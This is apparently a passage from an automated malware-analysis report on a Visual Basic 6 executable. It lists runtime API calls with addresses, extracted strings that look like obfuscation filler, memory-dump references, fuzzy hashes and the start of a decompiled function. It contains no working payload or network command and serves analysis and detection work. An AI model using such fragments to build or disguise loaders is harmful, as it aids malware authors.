__vbaStrCopy.MSVBVM60(?,0000000B,00000000,?,?,?,00000000), ref: 00415975
__vbaFreeStr.MSVBVM60(?,0000000B,00000000,?,?,?,00000000), ref: 00415980
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 00415995
__vbaFreeVar.MSVBVM60(?,0000000B,00000000,?,?,?,00000000), ref: 004159A3
__vbaNew2.MSVBVM60(00404370,00425010,?,0000000B,00000000,?,?,?,00000000), ref: 004159C2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004159FE
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000048), ref: 00415A45
__vbaDerefAry1.MSVBVM60(?,0000000C), ref: 00415A67
__vbaStrCopy.MSVBVM60(?,0000000C), ref: 00415A70
__vbaFreeStr.MSVBVM60(?,0000000C), ref: 00415A7B
__vbaFreeObj.MSVBVM60(?,0000000C), ref: 00415A86
__vbaDerefAry1.MSVBVM60(?,0000000D,?,0000000C), ref: 00415A9F
__vbaStrCopy.MSVBVM60(?,0000000D,?,0000000C), ref: 00415AA8
__vbaNew2.MSVBVM60(00404370,00425010,?,0000000D,?,0000000C), ref: 00415AC7
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415B03
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,000000E8), ref: 00415B52
__vbaDerefAry1.MSVBVM60(?,0000000E), ref: 00415B74
__vbaStrCopy.MSVBVM60(?,0000000E), ref: 00415B7D
__vbaFreeStr.MSVBVM60(?,0000000E), ref: 00415B88
__vbaFreeObj.MSVBVM60(?,0000000E), ref: 00415B93
__vbaDerefAry1.MSVBVM60(?,0000000F,?,0000000E), ref: 00415BAC
__vbaStrCopy.MSVBVM60(?,0000000F,?,0000000E), ref: 00415BB5
__vbaNew2.MSVBVM60(00404370,00425010,?,0000000F,?,0000000E), ref: 00415BD4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415C10
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000188), ref: 00415C5D
__vbaDerefAry1.MSVBVM60(?,00000010), ref: 00415C7F
__vbaStrCopy.MSVBVM60(?,00000010), ref: 00415C88
__vbaFreeStr.MSVBVM60(?,00000010), ref: 00415C93
__vbaFreeObj.MSVBVM60(?,00000010), ref: 00415C9E
__vbaDerefAry1.MSVBVM60(?,00000011,?,00000010), ref: 00415CB7
__vbaStrCopy.MSVBVM60(?,00000011,?,00000010), ref: 00415CC0
__vbaDerefAry1.MSVBVM60(?,00000012,?,00000011,?,00000010), ref: 00415CD9
__vbaStrCopy.MSVBVM60(?,00000012,?,00000011,?,00000010), ref: 00415CE2
__vbaDerefAry1.MSVBVM60(?,00000013,?,00000012,?,00000011,?,00000010), ref: 00415CFB
__vbaStrCopy.MSVBVM60(?,00000013,?,00000012,?,00000011,?,00000010), ref: 00415D04
__vbaNew2.MSVBVM60(00404370,00425010,?,00000013,?,00000012,?,00000011,?,00000010), ref: 00415D23
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415D5F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000188), ref: 00415DAC
__vbaDerefAry1.MSVBVM60(?,00000014), ref: 00415DCE
__vbaStrCopy.MSVBVM60(?,00000014), ref: 00415DD7
__vbaFreeStr.MSVBVM60(?,00000014), ref: 00415DE2
__vbaFreeObj.MSVBVM60(?,00000014), ref: 00415DED
__vbaDerefAry1.MSVBVM60(?,00000015,?,00000014), ref: 00415E06
__vbaStrCopy.MSVBVM60(?,00000015,?,00000014), ref: 00415E0F
__vbaDerefAry1.MSVBVM60(?,00000016,?,00000015,?,00000014), ref: 00415E28
__vbaStrCopy.MSVBVM60(?,00000016,?,00000015,?,00000014), ref: 00415E31
__vbaNew2.MSVBVM60(00404370,00425010,?,00000016,?,00000015,?,00000014), ref: 00415E50
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415E8C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,00000110), ref: 00415ED9
__vbaDerefAry1.MSVBVM60(?,00000017), ref: 00415EFB
__vbaStrCopy.MSVBVM60(?,00000017), ref: 00415F04
__vbaFreeStr.MSVBVM60(?,00000017), ref: 00415F0F
__vbaFreeObj.MSVBVM60(?,00000017), ref: 00415F1A
__vbaDerefAry1.MSVBVM60(?,00000018,?,00000017), ref: 00415F33
__vbaStrCopy.MSVBVM60(?,00000018,?,00000017), ref: 00415F3C
__vbaDerefAry1.MSVBVM60(?,00000019,?,00000018,?,00000017), ref: 00415F55
__vbaStrCopy.MSVBVM60(?,00000019,?,00000018,?,00000017), ref: 00415F5E
__vbaNew2.MSVBVM60(00404370,00425010,?,00000019,?,00000018,?,00000017), ref: 00415F7D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415FB9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000001C0), ref: 00416006
__vbaDerefAry1.MSVBVM60(?,0000001A), ref: 00416028
__vbaStrCopy.MSVBVM60(?,0000001A), ref: 00416031
__vbaFreeStr.MSVBVM60(?,0000001A), ref: 0041603C
__vbaFreeObj.MSVBVM60(?,0000001A), ref: 00416047
__vbaDerefAry1.MSVBVM60(?,0000001B,?,0000001A), ref: 00416060
__vbaStrCopy.MSVBVM60(?,0000001B,?,0000001A), ref: 00416069
__vbaNew2.MSVBVM60(00404370,00425010,?,0000001B,?,0000001A), ref: 00416088
__vbaObjSet.MSVBVM60(?,00000000), ref: 004160C4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000000F8), ref: 00416113
__vbaDerefAry1.MSVBVM60(?,0000001C), ref: 00416135
__vbaStrCopy.MSVBVM60(?,0000001C), ref: 0041613E
__vbaFreeStr.MSVBVM60(?,0000001C), ref: 00416149
__vbaFreeObj.MSVBVM60(?,0000001C), ref: 00416154
__vbaNew2.MSVBVM60(00404370,00425010,?,0000001C), ref: 00416173
__vbaObjSet.MSVBVM60(?,00000000), ref: 004161AF
__vbaHresultCheckObj.MSVBVM60(00000000,?,004052D8,00000070), ref: 004161F6
__vbaDerefAry1.MSVBVM60(?,0000001D), ref: 00416218
__vbaStrCopy.MSVBVM60(?,0000001D), ref: 00416221
__vbaFreeStr.MSVBVM60(?,0000001D), ref: 0041622C
__vbaFreeObj.MSVBVM60(?,0000001D), ref: 00416237
__vbaDerefAry1.MSVBVM60(?,0000001E,?,0000001D), ref: 00416250
__vbaStrCopy.MSVBVM60(?,0000001E,?,0000001D), ref: 00416259
__vbaNew2.MSVBVM60(00404370,00425010,?,0000001E,?,0000001D), ref: 00416278
__vbaObjSet.MSVBVM60(?,00000000), ref: 004162B4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000000F8), ref: 00416303
__vbaDerefAry1.MSVBVM60(?,0000001F), ref: 00416325
__vbaStrCopy.MSVBVM60(?,0000001F), ref: 0041632E
__vbaFreeStr.MSVBVM60(?,0000001F), ref: 00416339
__vbaFreeObj.MSVBVM60(?,0000001F), ref: 00416344
__vbaDerefAry1.MSVBVM60(?,00000020,?,0000001F), ref: 0041635D
__vbaStrCopy.MSVBVM60(?,00000020,?,0000001F), ref: 00416366
__vbaNew2.MSVBVM60(00404370,00425010,?,00000020,?,0000001F), ref: 00416385
__vbaObjSet.MSVBVM60(?,00000000), ref: 004163C1
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000190), ref: 0041640E
__vbaDerefAry1.MSVBVM60(?,00000021), ref: 00416430
__vbaStrCopy.MSVBVM60(?,00000021), ref: 00416439
__vbaFreeStr.MSVBVM60(?,00000021), ref: 00416444
__vbaFreeObj.MSVBVM60(?,00000021), ref: 0041644F
__vbaNew2.MSVBVM60(00404370,00425010,?,00000021), ref: 0041646E
__vbaObjSet.MSVBVM60(?,00000000), ref: 004164AA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000120), ref: 004164F7
__vbaDerefAry1.MSVBVM60(?,00000022), ref: 00416519
__vbaStrCopy.MSVBVM60(?,00000022), ref: 00416522
__vbaFreeStr.MSVBVM60(?,00000022), ref: 0041652D
__vbaFreeObj.MSVBVM60(?,00000022), ref: 00416538
__vbaNew2.MSVBVM60(00404370,00425010,?,00000022), ref: 00416557
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416593
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000001C0), ref: 004165E0
__vbaDerefAry1.MSVBVM60(?,00000023), ref: 00416602
__vbaStrCopy.MSVBVM60(?,00000023), ref: 0041660B
__vbaFreeStr.MSVBVM60(?,00000023), ref: 00416616
__vbaFreeObj.MSVBVM60(?,00000023), ref: 00416621
__vbaDerefAry1.MSVBVM60(?,00000024,?,00000023), ref: 0041663A
__vbaStrCopy.MSVBVM60(?,00000024,?,00000023), ref: 00416643
__vbaNew2.MSVBVM60(00404370,00425010,?,00000024,?,00000023), ref: 00416662
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041669E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000000F8), ref: 004166ED
__vbaDerefAry1.MSVBVM60(?,00000025), ref: 0041670F
__vbaStrCopy.MSVBVM60(?,00000025), ref: 00416718
__vbaFreeStr.MSVBVM60(?,00000025), ref: 00416723
__vbaFreeObj.MSVBVM60(?,00000025), ref: 0041672E
__vbaNew2.MSVBVM60(00404370,00425010,?,00000025), ref: 0041674D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416789
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000140), ref: 004167D6
__vbaDerefAry1.MSVBVM60(?,00000026), ref: 004167F8
__vbaStrCopy.MSVBVM60(?,00000026), ref: 00416801
__vbaFreeStr.MSVBVM60(?,00000026), ref: 0041680C
__vbaFreeObj.MSVBVM60(?,00000026), ref: 00416817
__vbaNew2.MSVBVM60(00404370,00425010,?,00000026), ref: 00416836
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416872
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000188), ref: 004168BF
__vbaDerefAry1.MSVBVM60(?,00000027), ref: 004168E1
__vbaStrCopy.MSVBVM60(?,00000027), ref: 004168EA
__vbaFreeStr.MSVBVM60(?,00000027), ref: 004168F5
__vbaFreeObj.MSVBVM60(?,00000027), ref: 00416900
__vbaDerefAry1.MSVBVM60(?,00000028,?,00000027), ref: 00416919
__vbaStrCopy.MSVBVM60(?,00000028,?,00000027), ref: 00416922
__vbaNew2.MSVBVM60(00404370,00425010,?,00000028,?,00000027), ref: 00416941
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041697D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000218), ref: 004169CA
__vbaDerefAry1.MSVBVM60(?,00000029), ref: 004169EC
__vbaStrCopy.MSVBVM60(?,00000029), ref: 004169F5
__vbaFreeStr.MSVBVM60(?,00000029), ref: 00416A00
__vbaFreeObj.MSVBVM60(?,00000029), ref: 00416A0B
__vbaNew2.MSVBVM60(00404370,00425010,?,00000029), ref: 00416A2A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416A66
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000048), ref: 00416AAD
__vbaDerefAry1.MSVBVM60(?,0000002A), ref: 00416ACF
__vbaStrCopy.MSVBVM60(?,0000002A), ref: 00416AD8
__vbaFreeStr.MSVBVM60(?,0000002A), ref: 00416AE3
__vbaFreeObj.MSVBVM60(?,0000002A), ref: 00416AEE
__vbaNew2.MSVBVM60(00404370,00425010,?,0000002A), ref: 00416B0D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416B49
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000188), ref: 00416B96
__vbaDerefAry1.MSVBVM60(?,0000002B), ref: 00416BB8
__vbaStrCopy.MSVBVM60(?,0000002B), ref: 00416BC1
__vbaFreeStr.MSVBVM60(?,0000002B), ref: 00416BCC
__vbaFreeObj.MSVBVM60(?,0000002B), ref: 00416BD7
__vbaNew2.MSVBVM60(00404370,00425010,?,0000002B), ref: 00416BF6
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416C32
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000140), ref: 00416C7F
__vbaDerefAry1.MSVBVM60(?,0000002C), ref: 00416CA1
__vbaStrCopy.MSVBVM60(?,0000002C), ref: 00416CAA
__vbaFreeStr.MSVBVM60(?,0000002C), ref: 00416CB5
__vbaFreeObj.MSVBVM60(?,0000002C), ref: 00416CC0
__vbaDerefAry1.MSVBVM60(?,0000002D,?,0000002C), ref: 00416CD9
__vbaStrCopy.MSVBVM60(?,0000002D,?,0000002C), ref: 00416CE2
__vbaNew2.MSVBVM60(00404370,00425010,?,0000002D,?,0000002C), ref: 00416D01
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416D3D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000048), ref: 00416D84
__vbaDerefAry1.MSVBVM60(?,0000002E), ref: 00416DA6
__vbaStrCopy.MSVBVM60(?,0000002E), ref: 00416DAF
__vbaFreeStr.MSVBVM60(?,0000002E), ref: 00416DBA
__vbaFreeObj.MSVBVM60(?,0000002E), ref: 00416DC5
__vbaNew2.MSVBVM60(00404370,00425010,?,0000002E), ref: 00416DE4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416E20
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000120), ref: 00416E6D
__vbaDerefAry1.MSVBVM60(?,0000002F), ref: 00416E8F
__vbaStrCopy.MSVBVM60(?,0000002F), ref: 00416E98
__vbaFreeStr.MSVBVM60(?,0000002F), ref: 00416EA3
__vbaFreeObj.MSVBVM60(?,0000002F), ref: 00416EAE
__vbaDerefAry1.MSVBVM60(?,00000030,?,0000002F), ref: 00416EC7
__vbaStrCopy.MSVBVM60(?,00000030,?,0000002F), ref: 00416ED0
__vbaDerefAry1.MSVBVM60(?,00000031,?,00000030,?,0000002F), ref: 00416EE9
__vbaStrCopy.MSVBVM60(?,00000031,?,00000030,?,0000002F), ref: 00416EF2
__vbaDerefAry1.MSVBVM60(?,00000032,?,00000031,?,00000030,?,0000002F), ref: 00416F0B
__vbaStrCopy.MSVBVM60(?,00000032,?,00000031,?,00000030,?,0000002F), ref: 00416F14
__vbaNew2.MSVBVM60(00404370,00425010,?,00000032,?,00000031,?,00000030,?,0000002F), ref: 00416F33
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416F6F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,00000048), ref: 00416FB6
__vbaDerefAry1.MSVBVM60(?,00000033), ref: 00416FD8
__vbaStrCopy.MSVBVM60(?,00000033), ref: 00416FE1
__vbaFreeStr.MSVBVM60(?,00000033), ref: 00416FEC
__vbaFreeObj.MSVBVM60(?,00000033), ref: 00416FF7
__vbaDerefAry1.MSVBVM60(?,00000034,?,00000033), ref: 00417010
__vbaStrCopy.MSVBVM60(?,00000034,?,00000033), ref: 00417019
__vbaDerefAry1.MSVBVM60(?,00000035,?,00000034,?,00000033), ref: 00417032
__vbaStrCopy.MSVBVM60(?,00000035,?,00000034,?,00000033), ref: 0041703B
__vbaNew2.MSVBVM60(00404370,00425010,?,00000035,?,00000034,?,00000033), ref: 0041705A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417096
__vbaHresultCheckObj.MSVBVM60(00000000,?,004052D8,00000048), ref: 004170DD
__vbaDerefAry1.MSVBVM60(?,00000036), ref: 004170FF
__vbaStrCopy.MSVBVM60(?,00000036), ref: 00417108
__vbaFreeStr.MSVBVM60(?,00000036), ref: 00417113
__vbaFreeObj.MSVBVM60(?,00000036), ref: 0041711E
__vbaNew2.MSVBVM60(00404370,00425010,?,00000036), ref: 0041713D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417179
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000000A8), ref: 004171C6
__vbaDerefAry1.MSVBVM60(?,00000037), ref: 004171E8
__vbaStrCopy.MSVBVM60(?,00000037), ref: 004171F1
__vbaFreeStr.MSVBVM60(?,00000037), ref: 004171FC
__vbaFreeObj.MSVBVM60(?,00000037), ref: 00417207
__vbaDerefAry1.MSVBVM60(?,00000038,?,00000037), ref: 00417220
__vbaStrCopy.MSVBVM60(?,00000038,?,00000037), ref: 00417229
__vbaDerefAry1.MSVBVM60(?,00000039,?,00000038,?,00000037), ref: 00417242
__vbaStrCopy.MSVBVM60(?,00000039,?,00000038,?,00000037), ref: 0041724B
__vbaNew2.MSVBVM60(00404370,00425010,?,00000039,?,00000038,?,00000037), ref: 0041726A
__vbaObjSet.MSVBVM60(?,00000000), ref: 004172A6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000140), ref: 004172F3
__vbaDerefAry1.MSVBVM60(?,0000003A), ref: 00417315
__vbaStrCopy.MSVBVM60(?,0000003A), ref: 0041731E
__vbaFreeStr.MSVBVM60(?,0000003A), ref: 00417329
__vbaFreeObj.MSVBVM60(?,0000003A), ref: 00417334
__vbaDerefAry1.MSVBVM60(?,0000003B,?,0000003A), ref: 0041734D
__vbaStrCopy.MSVBVM60(?,0000003B,?,0000003A), ref: 00417356
__vbaDerefAry1.MSVBVM60(?,0000003C,?,0000003B,?,0000003A), ref: 0041736F
__vbaStrCopy.MSVBVM60(?,0000003C,?,0000003B,?,0000003A), ref: 00417378
__vbaDerefAry1.MSVBVM60(?,0000003D,?,0000003C,?,0000003B,?,0000003A), ref: 00417391
__vbaStrCopy.MSVBVM60(?,0000003D,?,0000003C,?,0000003B,?,0000003A), ref: 0041739A
__vbaNew2.MSVBVM60(00404370,00425010,?,0000003D,?,0000003C,?,0000003B,?,0000003A), ref: 004173B9
__vbaObjSet.MSVBVM60(?,00000000), ref: 004173F5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000180), ref: 00417442
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00417467
__vbaStrVarMove.MSVBVM60(00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 00417470
__vbaStrMove.MSVBVM60(00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 0041747D
__vbaDerefAry1.MSVBVM60(?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 0041748C
__vbaStrCopy.MSVBVM60(?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 00417495
__vbaFreeStr.MSVBVM60(?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 004174A0
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?), ref: 004174B5
__vbaFreeVar.MSVBVM60(?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 004174C3
__vbaDerefAry1.MSVBVM60(?,0000003F,?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 004174DC
__vbaStrCopy.MSVBVM60(?,0000003F,?,0000003E,00000000,?,?,?,?,?,0000000B,00000000,?,?,?,00000000), ref: 004174E5
__vbaNew2.MSVBVM60(00404370,00425010,?,0000003F,?,0000003E,00000000,?,?,?,?,?,0000000B,00000000), ref: 00417504
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417540
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000000A8), ref: 0041758D
__vbaDerefAry1.MSVBVM60(?,00000040), ref: 004175AF
__vbaStrCopy.MSVBVM60(?,00000040), ref: 004175B8
__vbaFreeStr.MSVBVM60(?,00000040), ref: 004175C3
__vbaFreeObj.MSVBVM60(?,00000040), ref: 004175CE
__vbaDerefAry1.MSVBVM60(?,00000041,?,00000040), ref: 004175E7
__vbaStrCopy.MSVBVM60(?,00000041,?,00000040), ref: 004175F0
__vbaDerefAry1.MSVBVM60(?,00000042,?,00000041,?,00000040), ref: 00417609
__vbaStrCopy.MSVBVM60(?,00000042,?,00000041,?,00000040), ref: 00417612
__vbaDerefAry1.MSVBVM60(?,00000043,?,00000042,?,00000041,?,00000040), ref: 0041762B
__vbaStrCopy.MSVBVM60(?,00000043,?,00000042,?,00000041,?,00000040), ref: 00417634
__vbaDerefAry1.MSVBVM60(?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 0041764D
__vbaStrCopy.MSVBVM60(?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 00417656
__vbaNew2.MSVBVM60(00405090,00425698,?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 0041767C
__vbaChkstk.MSVBVM60(?,?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 004176D7
__vbaChkstk.MSVBVM60(?,?,00000044,?,00000043,?,00000042,?,00000041,?,00000040), ref: 004176EB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000038), ref: 00417731
__vbaVar2Vec.MSVBVM60(?,?), ref: 00417753
__vbaAryMove.MSVBVM60(?,?,?,?), ref: 00417766
__vbaFreeVar.MSVBVM60(?,?,?,?), ref: 00417771
__vbaNew2.MSVBVM60(00404370,00425010,004050F8), ref: 00417790
__vbaObjSet.MSVBVM60(?,00000000), ref: 004177CC
__vbaChkstk.MSVBVM60(?,00000000), ref: 004177EE
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000200), ref: 0041783A
__vbaFreeObj.MSVBVM60(00000000,?,004050B0,00000200), ref: 00417854
#606.MSVBVM60(00000001,00000002), ref: 0041787D
__vbaStrMove.MSVBVM60(00000001,00000002), ref: 0041788A
__vbaStrCmp.MSVBVM60(00405524,00000000,00000001,00000002), ref: 00417895
__vbaFreeStr.MSVBVM60(00405524,00000000,00000001,00000002), ref: 004178AF
__vbaFreeVar.MSVBVM60(00405524,00000000,00000001,00000002), ref: 004178BA
__vbaNew2.MSVBVM60(00405090,00425698,00405524,00000000,00000001,00000002), ref: 004178E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 0041794D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,000000F8), ref: 004179AF
__vbaStrMove.MSVBVM60(00000000,?,004050C0,000000F8), ref: 004179E2
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,000000F8), ref: 004179ED
__vbaNew2.MSVBVM60(00405090,00425698), ref: 00417A0C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00417A71
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000130), ref: 00417AD3
__vbaStrMove.MSVBVM60(00000000,?,004050C0,00000130), ref: 00417B06
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000130), ref: 00417B11
__vbaNew2.MSVBVM60(00404370,00425010), ref: 00417B37
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417B73
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000178), ref: 00417BC0
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00417BE5
__vbaNew2.MSVBVM60(00404370,00425010), ref: 00417C00
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417C3C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000048), ref: 00417C83
__vbaNew2.MSVBVM60(00405090,00425698), ref: 00417CAA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,0000004C), ref: 00417D0F
__vbaStrVarMove.MSVBVM60(?,00000000,?), ref: 00417D43
__vbaStrMove.MSVBVM60(?,00000000,?), ref: 00417D50
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A0,00000024), ref: 00417D8B
__vbaStrMove.MSVBVM60(00000000,?,004050A0,00000024), ref: 00417DBB
__vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 00417DD0
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 00417DF6
__vbaFreeVar.MSVBVM60 ref: 00417E04
__vbaVarDup.MSVBVM60(00405524,00000000,00000001,00000002), ref: 00417E30
#553.MSVBVM60(?,00000002,00405524,00000000,00000001,00000002), ref: 00417E43
__vbaVarTstNe.MSVBVM60(00008002,?,?,00000002,00405524,00000000,00000001,00000002), ref: 00417E6A
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?,?,00000002,00405524,00000000,00000001,00000002), ref: 00417E86
#648.MSVBVM60(0000000A), ref: 00417EBF
__vbaFreeVar.MSVBVM60(0000000A), ref: 00417ED1
#536.MSVBVM60(00000002,0000000A), ref: 00417EF8
__vbaStrMove.MSVBVM60(00000002,0000000A), ref: 00417F02
__vbaFreeVar.MSVBVM60(00000002,0000000A), ref: 00417F0D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404B0C,00000254), ref: 00417F50
#583.MSVBVM60(?,?,?,?,004050F8), ref: 00417F72
__vbaFpR8.MSVBVM60(?,?,?,?,004050F8), ref: 00417F77
#546.MSVBVM60(?,?,?,?,?,004050F8), ref: 00417F95
__vbaVarMove.MSVBVM60(?,?,?,?,?,004050F8), ref: 00417FA6
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,004050F8), ref: 00417FB4
#570.MSVBVM60(000000DE,000000FF,?,?,?,?,?,004050F8), ref: 00417FCC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404B3C,000006F8), ref: 0041800B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404B3C,000006FC), ref: 004180CA
__vbaVarForInit.MSVBVM60(?,?,?,00000002,00000003,00000002), ref: 00418145
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404B3C,00000700), ref: 004181E5
__vbaNew2.MSVBVM60(00404370,00425010), ref: 00418244
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418280
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004050B0,00000190), ref: 004182CD
__vbaFreeStr.MSVBVM60 ref: 0041830E
__vbaFreeObj.MSVBVM60 ref: 00418319
__vbaVarForNext.MSVBVM60(?,?,?), ref: 00418337

Strings

Haemagglutinate, xrefs: 00416350
TABB, xrefs: 00415713
TOLDBODS, xrefs: 004153F8
fabriksfremstil, xrefs: 00417340
Grundbog1, xrefs: 004176A5
Unsenescent1, xrefs: 00415CAA
Maoismes, xrefs: 0041690C
Homoneura, xrefs: 00415A92
queenly, xrefs: 0041761E
01/01/01, xrefs: 00417E10
Livstiden, xrefs: 00415F48
Tartronylurea6, xrefs: 00417003
seedstalk, xrefs: 00417025
Sidenummereringer, xrefs: 00415525
Bestvningers, xrefs: 00417362
}, xrefs: 0041834F
karries, xrefs: 0041662D
Mvres2, xrefs: 00415735
takstomraaderne, xrefs: 00416243
SKURKEN, xrefs: 00416053
Asarota, xrefs: 00417640
Fastfrysnings3, xrefs: 00415503
ATTACKMAN, xrefs: 00416CCC
inversionernes, xrefs: 00415CEE
berger, xrefs: 004175FC
micropathological, xrefs: 004174CF
TUBULATION, xrefs: 00414EAD
Reaccept8, xrefs: 00415B9F
UDKOMMANDOERNES, xrefs: 00417235
UNDERWROUGHT, xrefs: 00415757
Ploceiform, xrefs: 00417384
Gamle, xrefs: 00416EBA
Fremadrettede, xrefs: 00415779
reitemized, xrefs: 00415F26
CREEPERED, xrefs: 00415E1B
Coronize, xrefs: 00415CCC
Reechy, xrefs: 00416EDC
, xrefs: 00417860
AFSPOR, xrefs: 00417213
antilopen, xrefs: 00416EFE
Lipoclasis6, xrefs: 004175DA
SCENEFUNKTIONRENS, xrefs: 00415DF9

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Ary1CopyDeref$CheckHresult$New2$Move$List$CallLate$Chkstk$Error$#570#648System$#536#546#552#553#583#596#606#610#647#680AddrefInitNextRedimVar2
String ID: $01/01/01$AFSPOR$ATTACKMAN$Asarota$Bestvningers$CREEPERED$Coronize$Fastfrysnings3$Fremadrettede$Gamle$Grundbog1$Haemagglutinate$Homoneura$Lipoclasis6$Livstiden$Maoismes$Mvres2$Ploceiform$Reaccept8$Reechy$SCENEFUNKTIONRENS$SKURKEN$Sidenummereringer$TABB$TOLDBODS$TUBULATION$Tartronylurea6$UDKOMMANDOERNES$UNDERWROUGHT$Unsenescent1$antilopen$berger$fabriksfremstil$inversionernes$karries$micropathological$queenly$reitemized$seedstalk$takstomraaderne$}
API String ID: 1903932112-25405131
Opcode ID: 1199d53e6815d65da0db3ce86590b600c72919bf1f931fcb25d0ae2c87ca0140
Instruction ID: 48d0195a3f5036570879da2ae8b42d472708ca8168dda96d2b97764c10c643bc
Opcode Fuzzy Hash: 1199d53e6815d65da0db3ce86590b600c72919bf1f931fcb25d0ae2c87ca0140
Instruction Fuzzy Hash: 47831774A40229DFDB21EF50CC55FEDB7B4AB08308F5040EAE109B72A1CB795A85DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004184F6, Relevance: 114.3, APIs: 60, Strings: 5, Instructions: 518
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004184F6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int* _v16;
				void* _v28;
				void* _v44;
				void* _v48;
				short _v52;
				short _v56;
				long long _v64;
				short _v68;
				signed int _v76;
				char _v80;
				signed int _v84;
				void* _v88;
				char _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				char _v128;
				char _v136;
				signed int _v144;
				char _v152;
				intOrPtr _v160;
				char _v168;
				void* _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v216;
